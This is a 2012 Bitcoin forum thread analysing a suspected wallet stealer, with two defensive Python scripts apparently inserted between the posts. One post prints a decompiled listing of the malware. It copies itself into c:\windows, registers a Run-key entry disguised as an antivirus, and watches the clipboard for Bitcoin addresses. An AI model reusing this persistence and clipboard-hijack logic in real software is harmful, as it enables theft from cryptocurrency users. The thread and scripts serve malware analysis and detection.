Bitcoin Forum
January 20, 2018, 03:31:01 PM *
Author Topic: "allseingbiteye" - a virus, or just weird?  (Read 2272 times)
ThePiachu
Sr. Member
Activity: 442
January 28, 2012, 03:45:25 AM
 #1

On the Bitcoin SE someone mentioned this site:
http://[wallet stealer].tk/
Question can be found here:
http://bitcoin.stackexchange.com/q/2778/323

Has anyone checked whether this website is distributing some sort of virus?

1HWbVLhxj7bhewhyapMZpyhqWAeAhJd51E
My Bitcoin Calculator:
http://tpbitcalc.appspot.com/
grue
Global Moderator
Legendary
Activity: 2058
January 28, 2012, 04:10:28 AM
 #2

most likely a virus

decompiled winmain
Code:
int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
  int v4; // ebx@1
  unsigned int v5; // eax@9
  SIZE_T v6; // edi@10
  HANDLE v7; // esi@10
  const char *v8; // ecx@11
  HANDLE v9; // eax@11
  void *v10; // esi@11
  const CHAR *v11; // eax@11
  int v12; // ecx@14
  int v13; // edi@14
  CHAR v14; // al@15
  HKEY hKey; // [sp+Ch] [bp-17Ch]@30
  char v17; // [sp+13h] [bp-175h]@3
  void *v18; // [sp+14h] [bp-174h]@29
  unsigned int v19; // [sp+28h] [bp-160h]@28
  const char *v20; // [sp+30h] [bp-158h]@9
  int v21; // [sp+40h] [bp-148h]@9
  unsigned int v22; // [sp+44h] [bp-144h]@9
  CHAR ExistingFileName; // [sp+4Ch] [bp-13Ch]@1
  char v24; // [sp+61h] [bp-127h]@2
  char v25; // [sp+68h] [bp-120h]@1
  CHAR String1[52]; // [sp+150h] [bp-38h]@11
  unsigned int v27; // [sp+184h] [bp-4h]@1
  int v28; // [sp+188h] [bp+0h]@1

  v27 = (unsigned int)&v28 ^ __security_cookie;
  v4 = operator new(4u);
  *(_DWORD *)v4 = 33120;
  dword_40D9E4 = v4;
  memcpy(&ExistingFileName, "c:\\windows\\mcfartietrby.exe", 0x1Cu);
  memset(&v25, 0, 0xE8u);
  if ( sub_401040() == *(_DWORD *)v4 + 9 )
    --v24;
  *(_DWORD *)v4 += 9;
  v17 = strcmp(&ExistingFileName, (const char *)"c:\\windows\\mcfartietray.exe") == 0;
  if ( sub_401040() == *(_DWORD *)v4 )
  {
    if ( v17 )
    {
      if ( byte_40D9E8 )
        GetModuleFileNameA(0, &ExistingFileName, 0x104u);
    }
  }
  if ( CopyFileA(&ExistingFileName, (LPCSTR)"c:\\windows\\mcfartietray.exe", 1) )
  {
    RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 2u, &hKey);
    RegSetValueExA(hKey, "Avast72", 0, 1u, "c:\\windows\\mcfartietray.exe", 0x1Cu);
    ShellExecuteA(0, 0, (LPCSTR)"c:\\windows\\mcfartietray.exe", 0, "c:\\", 0);
    goto LABEL_31;
  }
  CreateMutexA(0, 0, "mcfartietray");
  if ( GetLastError() == 183 )
  {
LABEL_31:
    v0 = 0;
    return 0;
  }
  v5 = GetTickCount();
  srand(v5);
  v22 = 15;
  v21 = 0;
  LOBYTE(v20) = 0;
  if ( v17 )
  {
    while ( 1 )
    {
      do
      {
        do
        {
          Sleep(0x1F4u);
          OpenClipboard(0);
          v7 = GetClipboardData(1u);
          CloseClipboard();
          v6 = GlobalSize(v7);
        }
        while ( v6 - 30 > 9 );
        OpenClipboard(0);
        v9 = GetClipboardData(1u);
        v10 = v9;
        v11 = (const CHAR *)GlobalLock(v9);
        lstrcpyA(String1, v11);
        GlobalUnlock(v10);
        CloseClipboard();
        v8 = v20;
        if ( v22 < 0x10 )
          v8 = (const char *)&v20;
      }
      while ( !strcmp(String1, v8) );
      v13 = v6 - 1;
      v12 = 0;
      if ( v13 <= 0 )
      {
LABEL_26:
        if ( String1[0] == 49 || String1[0] == 51 )
        {
          sub_401430();
          sub_401590();
          if ( v19 >= 0x10 )
            operator delete(v18);
        }
      }
      else
      {
        while ( 1 )
        {
          v14 = String1[v12];
          if ( v14 < 49 || v14 > 57 )
          {
            if ( (v14 < 97 || v14 > 122) && (v14 < 65 || v14 > 90) )
              break;
          }
          if ( v14 == 108 || v14 == 73 || v14 == 79 || v14 == 48 )
            break;
          ++v12;
          if ( v12 >= v13 )
            goto LABEL_26;
        }
      }
    }
  }
  return 0;
}
it adds a program to system startup. pretty suspicious imo.
Virus scan: https://www.virustotal.com/file/d99c08d052a02e82ca1ae0ca17300f30c2a4fe8861fe8426afb4367b30daa279/analysis/1327723958/
Runtime analysis: http://anubis.iseclab.org/?action=result&task_id=17f90702efa19eb14a9df4ac9504bbf98&format=html

It is pitch black. You are likely to be eaten by a grue.

dooglus
Legendary
Activity: 2408
January 28, 2012, 07:01:55 AM
 #3

Quote
decompiled winmain

That's pretty impressive.  What tool did you use to do that?

sveetsnelda
Hero Member
Activity: 620
January 28, 2012, 07:48:46 AM
 #4

It even makes the run entry look like it's an antivirus scanner (Avast72). :)

Most certainly a virus/malware/spyware.

14u2rp4AqFtN5jkwK944nn741FnfF714m7
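The disguise sveetsnelda points out (a Run value named after an antivirus product that launches a bare executable from c:\windows) is exactly the kind of thing a host-side autostart audit can flag. The script below is an added illustration written for this thread, not code from the thread or from any of the tools mentioned in it. It checks each Run entry against two heuristics and, on Windows, can enumerate the live HKLM Run key with the standard-library winreg module; the sample entries are constructed, and only the Avast72 entry mirrors the one in grue's listing.

```python
import re
import sys

# Constructed Run-key entries (value name, command) of the kind an audit enumerates
# from HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. The third mirrors the
# disguise discussed in the thread: an antivirus-sounding name whose target is a
# bare executable in c:\windows instead of a vendor install directory.
SAMPLE_RUN_ENTRIES = [
    ("AvastUI.exe", r'"C:\Program Files\AVAST Software\Avast\AvastUI.exe" /nogui'),
    ("SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
    ("Avast72", r"c:\windows\mcfartietray.exe"),
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

# Vendor names a lookalike value would borrow (heuristic list, not exhaustive).
AV_WORDS = ("avast", "avg", "norton", "mcafee", "kaspersky", "defender", "eset", "bitdefender", "sophos")
# Locations where a legitimate security product's autostart binary would normally live.
TRUSTED_PREFIXES = tuple(p + "\\" for p in (
    r"c:\program files", r"c:\program files (x86)", r"c:\windows\system32", r"c:\programdata"))


def command_path(command: str) -> str:
    """Extract the executable path from a Run value: a quoted path, else the first token."""
    m = re.match(r'\s*"([^"]+)"', command)
    return m.group(1) if m else command.strip().split(" ", 1)[0]


def normalize(path: str) -> str:
    """Lower-case the path and resolve the common Windows-directory variables."""
    p = path.lower()
    for var in ("%windir%", "%systemroot%"):
        p = p.replace(var, r"c:\windows")
    return p


def audit_entry(name: str, command: str) -> list:
    """Return the reasons this autostart entry looks suspicious (empty list if none)."""
    path = normalize(command_path(command))
    reasons = []
    # A single .exe dropped straight into c:\windows is a classic self-copy location.
    if re.fullmatch(r"[a-z]:\\windows\\[^\\]+\.exe", path):
        reasons.append("target is a bare executable in the Windows root directory")
    # A vendor-sounding name whose target is not in a vendor or system directory.
    if any(w in name.lower() for w in AV_WORDS) and not path.startswith(TRUSTED_PREFIXES):
        reasons.append("antivirus-style value name but target outside any vendor or system directory")
    return reasons


def audit_run_entries(entries) -> dict:
    """Map each flagged value name to its list of reasons; clean entries are omitted."""
    flagged = {}
    for name, command in entries:
        reasons = audit_entry(name, command)
        if reasons:
            flagged[name] = reasons
    return flagged


def read_run_entries() -> list:
    """Enumerate the live HKLM Run key (Windows only; winreg is in the stdlib there)."""
    import winreg  # assumption: this function is only called on Windows
    key_path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
    entries = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key_path) as key:
        i = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, i)
            except OSError:  # no more values
                break
            entries.append((name, str(value)))
            i += 1
    return entries


if __name__ == "__main__":
    entries = read_run_entries() if sys.platform == "win32" else SAMPLE_RUN_ENTRIES
    for name, reasons in audit_run_entries(entries).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

Run on the constructed entries it flags only Avast72, on both counts. The trusted-prefix list is deliberately narrow: an entry that merely fails the prefix check is worth a look, not an automatic verdict, since legitimate software does sometimes autostart from a user profile directory.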
CD-RW
Jr. Member
Activity: 57
February 14, 2012, 09:12:47 AM
 #5

Sorry for bumping, I found some new information...
A new link got added about a Bitcoin generator on some Tor forum.

"Bitcoin generator.exe", 51.735 bytes.
SHA256: 1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b
Virustotal: https://www.virustotal.com/file/1f39c2b55839ffb833f653c44a6274230f6e61710c03153356911cd8cdd42f7b/analysis/

I found this thread due to the fact he still uses c:\windows\mcfartietrby.exe
I also found this email in the binary data: seren1ty0wns@gmail.com

Threatexpert for the file: http://www.threatexpert.com/report.aspx?md5=ede9632fc341e0279bb3f8a49b8730f1
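Both grue's decompiled listing (the Run key path, the copy to c:\windows, the Avast72 value name) and CD-RW's findings (the same drop path and an e-mail address sitting in the binary, plus a SHA256 to look up on VirusTotal) come from the same basic static triage: hash the file, pull out its printable strings, and pattern-match them for indicators. The script below is an added example written for this thread, not code from either poster or from any tool they mention. It runs over a constructed byte blob that stands in for a sample; the e-mail address in it is a placeholder, not the one CD-RW reported.

```python
import hashlib
import re

# Constructed stand-in for a binary under triage: junk bytes around strings of the
# kinds the thread reports finding (the Run key path, the dropped executable path
# and a contact e-mail). The e-mail is a placeholder, not the one in the thread.
SAMPLE_BYTES = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\x00"
    b"\x01\x02\x03"
    b"c:\\windows\\mcfartietray.exe\x00"
    b"Avast72\x00"
    b"mcfartietray\x00"
    b"\x00\x00\x00\xde\xad"
    b"contact@example.invalid\x00"
    b"\xff\xfe\x7f"
)

# (tag, pattern, explanation) triples applied to every extracted string.
INDICATORS = [
    ("run_key",
     re.compile(r"CurrentVersion\\Run\b", re.IGNORECASE),
     "references the autostart Run key (persistence)"),
    ("windows_root_exe",
     re.compile(r"^[a-z]:\\windows\\[^\\]+\.exe$", re.IGNORECASE),
     "executable path directly under the Windows directory (common drop location)"),
    ("email",
     re.compile(r"^[\w.+-]+@[\w-]+(\.[\w-]+)+$"),
     "embedded e-mail address (possible operator contact)"),
]


def extract_strings(data: bytes, min_len: int = 6) -> list:
    """Return runs of printable ASCII of at least min_len bytes, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def triage(data: bytes) -> dict:
    """Hash the sample and flag every string matching an indicator pattern."""
    strings = extract_strings(data)
    hits = [(tag, s, why) for s in strings for tag, rx, why in INDICATORS if rx.search(s)]
    return {
        "sha256": hashlib.sha256(data).hexdigest(),  # the value to compare with VirusTotal
        "size": len(data),
        "strings": strings,
        "hits": hits,
    }


def persistence_suspected(report: dict) -> bool:
    """True when the sample names both the Run key and a drop path under the Windows root."""
    tags = {tag for tag, _, _ in report["hits"]}
    return {"run_key", "windows_root_exe"} <= tags


if __name__ == "__main__":
    report = triage(SAMPLE_BYTES)
    print("sha256:", report["sha256"], "size:", report["size"])
    for tag, s, why in report["hits"]:
        print(f"[{tag}] {s!r}: {why}")
    print("persistence suspected:", persistence_suspected(report))
```

To use it on a real file, read the file in binary mode and pass the bytes to triage(); the hash it prints is what you would paste into the VirusTotal search, and the hits are the strings worth pivoting on (the drop path is how CD-RW connected the second sample to this thread). String matching is only a first pass: a packed sample will show none of these strings until it is unpacked, which is why the sandbox reports linked above complement it.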
MPOE-PR
Hero Member
Activity: 756
April 20, 2012, 12:50:06 AM
 #6

Quote
mcfartietray.exe

...McFartieTray?! Sounds foul either way.

My Credentials  | THE BTC Stock Exchange | I have my very own anthology! | Use bitcointa.lk, it's like this one but better.